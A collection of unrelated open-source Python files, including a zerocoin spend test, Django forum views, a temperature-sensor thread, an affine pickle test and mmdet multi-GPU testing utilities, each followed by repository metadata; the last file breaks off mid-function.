zpny_balance = self.nodes[2].getzerocoinbalance()['Total']
assert_equal(balance, DecimalAmt(13833.92))
assert_equal(zpny_balance, 6666)
# Export zerocoin data
listmints = self.nodes[2].listmintedzerocoins(True, True)
serial_ids = [mint["serial hash"] for mint in listmints]
exported_zerocoins = [x for x in self.nodes[2].exportzerocoins(False) if x["id"] in serial_ids]
exported_zerocoins.sort(key=lambda x: x["d"], reverse=False)
assert_equal(8, len(exported_zerocoins))
# 1) stake more blocks - save a v3 spend for later (serial_1)
serial_1, randomness_1, privkey_1, id_1, denom_1, tx_1 = get_zerocoin_data(exported_zerocoins[1])
self.log.info("Staking 70 blocks to get to public spend activation")
for j in range(5):
for peer in range(2):
for i in range(7):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
old_spend_v3 = self.nodes[2].createrawzerocoinspend(id_1)
# 2) Spend one minted coin - spend v3 (serial_2)
serial_2, randomness_2, privkey_2, id_2, denom_2, tx_2 = get_zerocoin_data(exported_zerocoins[2])
self.log.info("Spending the minted coin with serial %s..." % serial_2[:16])
txid = self.nodes[2].spendzerocoinmints([id_2])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_2, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
# 3) Check double spends - spend v3
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
# 4) Activate v4 spends with SPORK_18
self.setV4SpendEnforcement()
# 5) Spend one minted coin - spend v4 (serial_3)
serial_3, randomness_3, privkey_3, id_3, denom_3, tx_3 = get_zerocoin_data(exported_zerocoins[3])
self.log.info("Spending the minted coin with serial %s..." % serial_3[:16])
txid = self.nodes[2].spendzerocoinmints([id_3])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_3, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v4) PASSED")
# 6) Check double spends - spend v4
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_3, randomness_3, denom_3, privkey_3, "", tx_3)
# 7) Try to relay old v3 spend now (serial_1)
self.log.info("Trying to send old v3 spend now...")
assert_raises_rpc_error(-26, "bad-txns-invalid-zpny",
self.nodes[2].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 8) Try to double spend with v4 a mint already spent with v3 (serial_2)
self.log.info("Trying to double spend v4 against v3...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 9) Reactivate v3 spends and try to spend the old saved one (serial_1) again
self.setV4SpendEnforcement(False)
self.log.info("Trying to send old v3 spend now (serial: %s...)" % serial_1[:16])
txid = self.nodes[2].sendrawtransaction(old_spend_v3)
# stake 4 blocks - check it gets included on chain and check balances
_ = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
# need to reset spent mints since this was a raw broadcast
self.nodes[2].resetmintzerocoin()
_, _ = check_balances(denom_1, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
if __name__ == '__main__':
ZerocoinSpendTest().main()
| 43.775148 | 117 | 0.643687 | [
"MIT"
] | pw512/peony | test/functional/wallet_zerocoin_publicspends.py | 7,398 | Python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigurationQueriesTestResponse(Model):
"""ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
"""
_attribute_map = {
'target_condition_error': {'key': 'targetConditionError', 'type': 'str'},
'custom_metric_query_errors': {'key': 'customMetricQueryErrors', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(ConfigurationQueriesTestResponse, self).__init__(**kwargs)
self.target_condition_error = kwargs.get('target_condition_error', None)
self.custom_metric_query_errors = kwargs.get('custom_metric_query_errors', None)
| 38.121212 | 90 | 0.645469 | [
"MIT"
] | Jackbk/azure-iot-cli-extension | azext_iot/sdk/iothub/service/models/configuration_queries_test_response.py | 1,258 | Python |
########################################################
# run_tp.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2014/5/8
# Implemented approach: CloudPred
# Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE
########################################################
import numpy as np
import os, sys, time
import multiprocessing
sys.path.append('src')
# Build external model
if not os.path.isfile('src/core.so'):
print 'Lack of core.so (built from the C++ module).'
print 'Please first build the C++ code into core.so by using: '
print '>> python setup.py build_ext --inplace'
sys.exit()
from utilities import *
import evaluator
import dataloader
#########################################################
# config area
#
para = {'dataType': 'tp', # set the dataType as 'rt' or 'tp'
'dataPath': '../data/dataset#1/',
'outPath': 'result/',
'metrics': ['MAE', 'NMAE', 'RMSE', 'MRE', 'NPRE'], # delete where appropriate
'density': list(np.arange(0.05, 0.31, 0.05)), # matrix density
'rounds': 20, # how many runs are performed at each matrix density
'dimension': 20, # dimenisionality of the latent factors
'lambda': 800, # regularization parameter
'topK': 10, # the parameter of TopK similar users or services, the default value is
# topK = 10 as in the reference paper
'weight': 0.5, # the combination weight of UPCC and IPCC, the default value is
# weight = 0.5 as in the reference paper
'maxIter': 300, # the max iterations
'saveTimeInfo': False, # whether to keep track of the running time
'saveLog': False, # whether to save log into file
'debugMode': False, # whether to record the debug info
'parallelMode': True # whether to leverage multiprocessing for speedup
}
initConfig(para)
#########################################################
startTime = time.clock() # start timing
logger.info('==============================================')
logger.info('CloudPred: [Zhang et al, SRDS\'2011].')
# load the dataset
dataMatrix = dataloader.load(para)
logger.info('Loading data done.')
# run for each density
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for density in para['density']:
pool.apply_async(evaluator.execute, (dataMatrix, density, para))
pool.close()
pool.join()
else: # run on single processes
for density in para['density']:
evaluator.execute(dataMatrix, density, para)
logger.info(time.strftime('All done. Total running time: %d-th day - %Hhour - %Mmin - %Ssec.',
time.gmtime(time.clock() - startTime)))
logger.info('==============================================')
sys.path.remove('src')
| 36.040541 | 94 | 0.608549 | [
"MIT"
] | YuwenXiong/WS-DREAM | benchmarks/hybrid/CloudPred/run_tp.py | 2,667 | Python |
"""This code demonstrates how to perform the tested data reduction module.
"""
import os
import sys
import glob
import pyabf
import matplotlib.pyplot as plt
pathToHere = os.path.abspath(os.path.dirname(__file__))
pathToData = os.path.abspath(pathToHere + "/../data/")
pathToModule = os.path.abspath(pathToHere + "/../../src/")
sys.path.insert(0, pathToModule)
import drtest as dr
for file in sorted(glob.glob(pathToData + "/*.abf")):
abf = pyabf.ABF(file)
abf.setSweep(4, 1)
xdata = abf.sweepX
ydata = abf.sweepY
da = dr.DataAnalysis(xdata, ydata)
xdec, ydec = da.data_reduction(method='decimate', reduction_factor=4)
xavr, yavr = da.data_reduction(method='average', reduction_factor=4)
xmin, ymin = da.data_reduction(method='min', reduction_factor=4)
xmax, ymax = da.data_reduction(method='max', reduction_factor=4)
xminmax, yminmax = da.data_reduction(method='min/max', reduction_factor=4)
xxxx = [xdec, xavr, xmin, xmax, xminmax]
yyyy = [ydec, yavr, ymin, ymax, yminmax]
## 2D plot
# plt.plot(xdec, ydec)
# plt.plot(xavr, yavr)
# plt.plot(xmin, ymin)
# plt.plot(xmax, ymax)
# plt.show()
## 3D plot
fig = plt.figure()
ax = fig.gca(projection='3d')
zs = [i for i in range(0, 6)]
ax.plot(xdata, ydata, zs[0], zdir='y', color='black', linewidth=1.5)
ax.plot(xdec, ydec, zs[1], zdir='y', color='red', linewidth=1.5)
ax.plot(xavr, yavr, zs[2], zdir='y', color='green', linewidth=1.5)
ax.plot(xmin, ymin, zs[3], zdir='y', color='orange', linewidth=1.5)
ax.plot(xmax, ymax, zs[4], zdir='y', color='blue', linewidth=1.5)
ax.plot(xminmax, yminmax, zs[5], zdir='y', color='brown', linewidth=1.5)
zlabels = [' ', 'raw data', 'decimate', 'average', 'minimum', 'maximum', 'min/max']
ax.set_xlabel('Time (s)', fontweight='bold', fontsize='medium')
ax.set_zlabel('Voltage (mV)', fontweight='bold', fontsize='medium')
ax.set_yticklabels(zlabels, rotation=-15, verticalalignment='baseline', horizontalalignment='left', fontweight='bold')
for angle in range(0, 360):
ax.view_init(25, angle)
plt.draw()
plt.pause(.0001) | 35.692308 | 123 | 0.608621 | [
"MIT"
] | MS44neuro/drtest | examples/scripts/data_reduction_ex1.py | 2,320 | Python |
"""
Validate that instances of `affine.Affine()` can be pickled and unpickled.
"""
import pickle
from multiprocessing import Pool
import affine
def test_pickle():
a = affine.Affine(1, 2, 3, 4, 5, 6)
assert pickle.loads(pickle.dumps(a)) == a
def _mp_proc(x):
# A helper function - needed for test_with_multiprocessing()
# Can't be defined inside the test because multiprocessing needs
# everything to be in __main__
assert isinstance(x, affine.Affine)
return x
def test_with_multiprocessing():
a1 = affine.Affine(1, 2, 3, 4, 5, 6)
a2 = affine.Affine(6, 5, 4, 3, 2, 1)
results = Pool(2).map(_mp_proc, [a1, a2])
for expected, actual in zip([a1, a2], results):
assert expected == actual
| 24 | 74 | 0.668011 | [
"MIT"
] | Con-Mi/lambda-packs | Lxml_requests/source/affine/tests/test_pickle.py | 744 | Python |
# -*- coding: utf-8 -*-
"""
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from binascii import hexlify
from gevent.event import AsyncResult
from gevent.queue import Queue
from zeronimo.exceptions import TaskClosed
from zeronimo.helpers import make_repr
from zeronimo.messaging import BREAK, DONE, RAISE, RETURN, YIELD
__all__ = ['RemoteResult', 'RemoteException', 'RemoteIterator']
class RemoteResult(AsyncResult):
"""The task object.
:param customer: the customer object.
:param id: the task identifier.
:param invoker_id: the identifier of the invoker which spawned this task.
:param worker_info: the value the worker sent at accepting.
"""
def __init__(self, collector, call_id, task_id, worker_info=None):
super(RemoteResult, self).__init__()
self.collector = collector
self.call_id = call_id
self.task_id = task_id
self.worker_info = worker_info
def close(self):
"""Stops to collect replies from its task."""
self.set_exception(TaskClosed)
self.collector.remove_result(self)
# iterator
_iterator = False
def is_iterator(self):
return self._iterator
def set_iterator(self):
self._iterator = True
self.set(RemoteIterator())
# exception
def set_remote_exception(self, remote_exc_info):
"""Raises an exception as a :exc:`RemoteException`."""
exc_type, exc_str, filename, lineno = remote_exc_info[:4]
exc_type = RemoteException.compose(exc_type)
exc = exc_type(exc_str, filename, lineno, self.worker_info)
if len(remote_exc_info) > 4:
state = remote_exc_info[4]
exc.__setstate__(state)
self.set_exception(exc)
def set_exception(self, exc):
if self.is_iterator():
self.get().throw(exc)
else:
super(RemoteResult, self).set_exception(exc)
# reply receivers
def set_reply(self, method, value):
if method == RETURN:
self._return(value)
elif method == YIELD:
self._yield(value)
elif method == RAISE:
self._raise(value)
elif method == BREAK:
self._break(value)
if method & DONE:
self.collector.remove_result(self)
def _return(self, value):
self.set(value)
def _yield(self, value):
if not self.is_iterator():
self.set_iterator()
self.get().send(value)
def _raise(self, value):
self.set_remote_exception(value)
def _break(self, value):
if self.is_iterator():
self.get().close()
else:
self.set(iter([]))
def __repr__(self):
return make_repr(self, None, ['call_id', 'task_id', 'worker_info'],
reprs={'call_id': hexlify, 'task_id': hexlify})
class RemoteException(BaseException):
_composed = {}
@classmethod
def compose(cls, exc_type):
try:
return cls._composed[exc_type]
except KeyError:
class composed_exc_type(exc_type, cls):
__init__ = cls.__init__
composed_exc_type.exc_type = exc_type
composed_exc_type.exctype = exc_type # For backward compatibility.
composed_exc_type.__name__ = exc_type.__name__ + '(Remote)'
# Avoid to start with dot in traceback.
composed_exc_type.__module__ = 'exceptions'
cls._composed[exc_type] = composed_exc_type
return composed_exc_type
def __init__(self, message, filename=None, lineno=None, worker_info=None):
super(RemoteException, self).__init__(message)
self.filename = filename
self.lineno = lineno
self.worker_info = worker_info
def __str__(self):
string = super(RemoteException, self).__str__()
if self.filename is not None:
string += ' ({0}:{1})'.format(self.filename, self.lineno)
return string
class RemoteIterator(object):
def __init__(self):
self.queue = Queue()
def __iter__(self):
return self
def send(self, value):
if self.queue is None:
raise StopIteration
self.queue.put((True, value))
def throw(self, exc):
if self.queue is None:
raise StopIteration
self.queue.put((False, exc))
def close(self):
self.throw(StopIteration)
def __next__(self):
if self.queue is None:
raise StopIteration
yields, value = self.queue.get()
if yields:
return value
else:
self.queue = None
raise value
next = __next__ # for Python 2
| 27.68 | 79 | 0.615607 | [
"BSD-3-Clause"
] | sublee/zeronimo | zeronimo/results.py | 4,844 | Python |
from forums.models import Forum, Comment
from django.views import View
from django.views import generic
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from forums.forms import CommentForm
from myarts.owner import OwnerListView, OwnerDetailView, OwnerCreateView, OwnerUpdateView, OwnerDeleteView
class ForumListView(OwnerListView):
model = Forum
template_name = "forums/list.html"
class ForumDetailView(OwnerDetailView):
model = Forum
template_name = "forums/detail.html"
def get(self, request, pk) :
x = get_object_or_404(Forum, id=pk)
comments = Comment.objects.filter(forum=x).order_by('-updated_at')
comment_form = CommentForm()
context = { 'forum' : x, 'comments': comments, 'comment_form': comment_form }
return render(request, self.template_name, context)
class ForumCreateView(OwnerCreateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumUpdateView(OwnerUpdateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumDeleteView(OwnerDeleteView):
model = Forum
template_name = "forums/delete.html"
class CommentCreateView(LoginRequiredMixin, View):
def post(self, request, pk) :
f = get_object_or_404(Forum, id=pk)
comment = Comment(text=request.POST['comment'], owner=request.user, forum=f)
comment.save()
return redirect(reverse('forums:forum_detail', args=[pk]))
class CommentDeleteView(OwnerDeleteView):
model = Comment
template_name = "forums/comment_delete.html"
# https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id
def get_success_url(self):
forum = self.object.forum
return reverse('forums:forum_detail', args=[forum.id])
| 33.016949 | 106 | 0.724846 | [
"MIT"
] | wajihma/Django | forums/views.py | 1,948 | Python |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
"""Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
"""
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
# print "got keyword %r; nextInd = %r" % (keyword, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
# print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| 39.111111 | 92 | 0.636048 | [
"BSD-3-Clause"
] | sdss/opscore | python/opscore/RO/ParseMsg/ParseData.py | 3,168 | Python |
from django.template.backends import django
from django.shortcuts import render, redirect
def main_board(request):
return render(request, 'main_page.html')
def redirect_main(request):
return redirect('main_boar_url', permanent=True)
| 20.5 | 52 | 0.780488 | [
"MIT"
] | nikonura/ITMO_ICT_WebProgramming_2020 | students/k3342/laboratory_works/Nikonchuk_Anna/Lr1/minos/minos/views.py | 246 | Python |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime, time
from lingua_franca.parse import extract_datetime
from lingua_franca.parse import extract_number
from lingua_franca.parse import normalize
class TestNormalize(unittest.TestCase):
def test_extractnumber_sv(self):
self.assertEqual(extract_number("1 och en halv deciliter",
lang='sv-se'), 1.5)
self.assertEqual(extract_number("det här är det första testet",
lang='sv-se'), 1)
self.assertEqual(extract_number("det här är test nummer 2",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är det andra testet",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är tredje testet",
lang='sv-se'), 3)
self.assertEqual(extract_number("det här är test nummer 4",
lang='sv-se'), 4)
self.assertEqual(extract_number("en tredjedels dl",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("tre deciliter",
lang='sv-se'), 3)
self.assertEqual(extract_number("1/3 deciliter",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("1/4 dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("2/3 dl",
lang='sv-se'), 2.0 / 3.0)
self.assertEqual(extract_number("3/4 dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("1 och 3/4 dl",
lang='sv-se'), 1.75)
self.assertEqual(extract_number("tre fjärdedels dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("trekvarts kopp",
lang='sv-se'), 3.0 / 4.0)
def test_extractdatetime_sv(self):
def extractWithFormat(text):
date = datetime(2017, 6, 27, 0, 0)
[extractedDate, leftover] = extract_datetime(text, date,
lang='sv-se')
extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
return [extractedDate, leftover]
def testExtract(text, expected_date, expected_leftover):
res = extractWithFormat(text)
self.assertEqual(res[0], expected_date)
self.assertEqual(res[1], expected_leftover)
testExtract("Planera bakhållet 5 dagar från nu",
"2017-07-02 00:00:00", "planera bakhållet")
testExtract("Vad blir vädret i övermorgon?",
"2017-06-29 00:00:00", "vad blir vädret")
testExtract("Påminn mig klockan 10:45",
"2017-06-27 10:45:00", "påminn mig klockan")
testExtract("vad blir vädret på fredag morgon",
"2017-06-30 08:00:00", "vad blir vädret")
testExtract("vad blir morgondagens väder",
"2017-06-28 00:00:00", "vad blir väder")
testExtract("påminn mig att ringa mamma om 8 veckor och 2 dagar",
"2017-08-24 00:00:00", "påminn mig att ringa mamma om och")
testExtract("Spela Kurt Olssons musik 2 dagar från Fredag",
"2017-07-02 00:00:00", "spela kurt olssons musik")
testExtract("vi möts 20:00",
"2017-06-27 20:00:00", "vi möts")
def test_extractdatetime_default_sv(self):
default = time(9, 0, 0)
anchor = datetime(2017, 6, 27, 0, 0)
res = extract_datetime('påminn mig att klippa mig på fredag',
anchor, lang='sv-se', default_time=default)
self.assertEqual(default, res[0].time())
def test_numbers(self):
self.assertEqual(normalize("det här är ett ett två tre test",
lang='sv-se'),
"det här är 1 1 2 3 test")
self.assertEqual(normalize(" det är fyra fem sex test",
lang='sv-se'),
"det är 4 5 6 test")
self.assertEqual(normalize("det är sju åtta nio test",
lang='sv-se'),
"det är 7 8 9 test")
self.assertEqual(normalize("det är tio elva tolv test",
lang='sv-se'),
"det är 10 11 12 test")
self.assertEqual(normalize("det är arton nitton tjugo test",
lang='sv-se'),
"det är 18 19 20 test")
if __name__ == "__main__":
unittest.main()
| 48.168067 | 79 | 0.527041 | [
"Apache-2.0"
] | JarbasAl/lingua-franca | test/test_parse_sv.py | 5,778 | Python |
# -----------------------------------------------------
# File: temperature.py
# Author: Tanner L
# Date: 09/20/19
# Desc: Temperature sensor communication
# Inputs:
# Outputs: temperature
# -----------------------------------------------------
import threading as th
import logging
import time
import interface
import adafruit_dht # import library for temperature sensor
import board
# -----------------------------------------------------
# Function: class - temperatureThread
# Author: Tanner L
# Date: 10/10/19
# Desc: Adjusts gps values based on settings for display
# Inputs:
# Outputs:
# -----------------------------------------------------
class TemperatureThread(th.Thread):
def __init__(self):
th.Thread.__init__(self)
logging.info('--------------------TEMPERATURE START----------------------------')
self.go = True
# -----------------------------------------------------
# Function: run
# Author: Tanner L
# Date: 10/10/19
# Desc: Loop for temperatureThread, gets temperature from sensor
# Inputs:
# Outputs:
# -----------------------------------------------------
def run(self):
sensor = adafruit_dht.DHT11(board.D16) # setup dht11 to be read
while self.go:
try:
interface.temperature_queue = sensor.temperature # read in temperature
except:
logging.error('Temperature Sensor Error')
print('Temp Read Error')
if interface.temperature_queue <= 0:
time.sleep(1) # send new temperature every 1 seconds
else:
time.sleep(10)
# -----------------------------------------------------
# Function: stop_thread
# Author: Tanner L
# Date: 10/10/19
# Desc: Stops thread for shutdown
# -----------------------------------------------------
def stop_thread(self): # used to kill thread
self.go = False
| 29.681818 | 89 | 0.469117 | [
"MIT"
] | tdroque/byke_interface | byke_interface/temperature.py | 1,959 | Python |
from bokeh.layouts import gridplot
from bokeh.models import BooleanFilter, CDSView, ColumnDataSource
from bokeh.plotting import figure, show
source = ColumnDataSource(data=dict(x=[1, 2, 3, 4, 5], y=[1, 2, 3, 4, 5]))
booleans = [True if y_val > 2 else False for y_val in source.data['y']]
view = CDSView(filter=BooleanFilter(booleans))
tools = ["box_select", "hover", "reset"]
p = figure(height=300, width=300, tools=tools)
p.circle(x="x", y="y", size=10, hover_color="red", source=source)
p_filtered = figure(height=300, width=300, tools=tools,
x_range=p.x_range, y_range=p.y_range)
p_filtered.circle(x="x", y="y", size=10, hover_color="red", source=source, view=view)
show(gridplot([[p, p_filtered]]))
| 40.388889 | 85 | 0.698762 | [
"BSD-3-Clause"
] | harmbuisman/bokeh | sphinx/source/docs/user_guide/examples/data_filtering_boolean_filter.py | 727 | Python |
# while ve if ile hesap makinesi ornegi
giriş = """
(1) topla
(2) çıkar
(3) çarp
(4) böl
(5) karesini hesapla
(6) karekök hesapla
(7) cikis
"""
print(giriş)
while True:
soru = int(input("Yapmak istediğiniz işlemin numarasını girin : "))
if soru == 7:
print("çıkılıyor...")
break
elif soru == 1:
sayı1 = int(input("Toplama işlemi için ilk sayıyı girin : "))
sayı2 = int(input("Toplama işlemi için ikinci sayıyı girin : "))
print(sayı1, "+", sayı2, "=", sayı1 + sayı2)
elif soru == 2:
sayı3 = int(input("Çıkarma işlemi için ilk sayıyı girin : "))
sayı4 = int(input("Çıkarma işlemi için ikinci sayıyı girin : "))
print(sayı3, "-", sayı4, "=", sayı3 - sayı4)
elif soru == 3:
sayı5 = int(input("Çarpma işlemi için ilk sayıyı girin : "))
sayı6 = int(input("Çarpma işlemi için ikinci sayıyı girin : "))
print(sayı5, "x", sayı6, "=", sayı5 * sayı6)
elif soru == 4:
sayı7 = int(input("Bölme işlemi için ilk sayıyı girin : "))
sayı8 = int(input("Bölme işlemi için ikinci sayıyı girin : "))
print(sayı7, "/", sayı8, "=", sayı7 / sayı8)
elif soru == 5:
sayı9 = int(input("Karesini hesaplamak istediğiniz sayıyı girin : "))
print(sayı9, "sayısının karesi = ", sayı9 ** 2)
elif soru == 6:
sayı10 = int(input("Karekökünü hesaplamak istediğiniz sayıyı girin: "))
print(sayı10, "sayısının karekökü = ", sayı10 ** 0.5)
else:
print("Yanlış giriş.")
print("Aşağıdaki seçeneklerden birini giriniz :", giriş)
| 31.615385 | 80 | 0.574209 | [
"MIT"
] | omerkocadayi/WeWantEd---Pythona-Giris | 04-hesap-makinesi.py | 1,754 | Python |
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
def collect_results_cpu(result_part, size, tmpdir=None):
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN,),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
